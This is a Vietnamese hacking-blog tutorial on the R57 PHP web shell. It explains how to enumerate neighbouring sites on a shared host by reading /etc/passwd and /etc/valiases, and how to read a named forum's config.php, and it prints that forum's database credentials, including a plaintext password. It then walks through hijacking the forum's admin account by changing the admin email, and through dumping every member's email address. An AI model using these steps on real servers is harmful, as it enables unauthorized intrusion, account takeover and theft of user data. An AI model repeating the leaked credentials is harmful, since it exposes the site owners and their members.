Hướng dẩn sử dụng Shell R57

Giả sử đã up được con r57.php lên host,sau đó 
Mã:
cat /etc/passwd
và ra được các path của những victim khác trên cùng server:
ex: /home/user1
/home/user2
……………..
vấn đề là làm sao biết được domain của user1 và user2 đây?Tớ đã sử dụng


Mã:
cat /var/cpanel/accounting.log

Mã:
cat /etc/domains
nhưng đều không thành công

kiểm tra các sites trên cùng server này

Code:
Mã:
ls -la /etc/valiases
dùng thêm live hoặc công cụ tìm kiếm để search
live.com ip : xxx.xxx.xxx.xxx

Code:
Mã:
cd /etc/vdomainaliases && ls -lia
cd /etc/vdomainaliases;ls -lia
cd /etc/valiases && ls -lia
cd /etc/valiases;ls -lia
nó sẽ hiện ra…………………….. dạng như sau
Mã:
 
819980 -rw-r–r– 1 flfounin nobody 0 Mar 17 13:34 fl4938r.com
4821034 -rw-r–r– 1 flanchen nobody 0 Mar 17 13:33 flanche.net
4826219 -rw-r–r– 1 bangings nobody 0 Mar 17 13:35 fonerahacks.bangingscrew.com
4826135 -rw-r–r– 1 bangings nobody 0 Mar 17 13:35 fonerahacks.com
4824052 -rw-r–r– 1 illusio4 nobody 0 Mar 17 13:33 forgehalo-net.illusion-gfx.com
4824049 -rw-r–r– 1 illusio4 nobody 0 Mar 17 13:33 forgehalo.net
4823877 -rw-r–r– 1 forgetbu nobody 0 Mar 17 13:33 forgetbuttons.com
Tiếp tục là local
Trên r57 shell dùng lệnh :
vd: sever nhactre
Mã:
ls /home/yeutruct/public_html/nhactre/


tiếp tục dùng lệnh ls vào thư mục 4rum/includes :


Ah ha, file config đây rồi, dùng lệnh cat /home/yeutruct/public_html/nhactre/4rum/includes/c onfig.php để xem nội dung :

Ta có được các thông tin về database :
Mã:
$config['Database']['dbname'] = ‘yeutruct_nhactre’;$config['MasterServer']['username'] = ‘yeutruct_nhactre’;$config['MasterServer']['password'] = ‘mekiep’;
Trên r57 >>> Database >>> Run SQL query điền các thông tin tìm được vào :

Nhấn Execute .
Tiếp tục run SQL command :

Ta sẽ có được toàn bộ các tables trong database này, nhưng hiện tại vấn đề ở đây chúng ta chỉ cần những tables quan trọng :

Tới đây là thấy khỏe khoắn rồi, userid = 1 đích thị là admin.

Theo các bạn thì chúng ta sẽ làm tiếp thế nào đây? VBB sử dụng hash MD5 đã qua xử lý (salted hashed) nên ko thể dùng hash MD5 bình thường để thay thế. Vậy làm sao để đổi password của admin đây nhỉ ?

Hihi đành chịu khó mất thêm tí thời gian vậy , đổi password ko ổn thì ta sẽ đổi email :

Sẵn tiện tay dùng thêm câu lệnh SELECT email FROM user để ” thâu tóm ” toàn bộ email thành viên diễn đàn này .
Tiếp tục vào forum của trang nhactre.vn và sử dụng chức năng forgot password >>> kết quả tiếp theo :


Backup Database:
Mã:
mysql -u username -p password dbname
> /path/to/dump.sqlRestore Database:
Mã:
mysql -u username -p password dbname < /path/to/dump.sql

Chú Ý:

Coppy phải ghi rõ nguồn Hacking Security
 

Copyright © 123 H4ck' Blog. Cung cấp bởi Blogger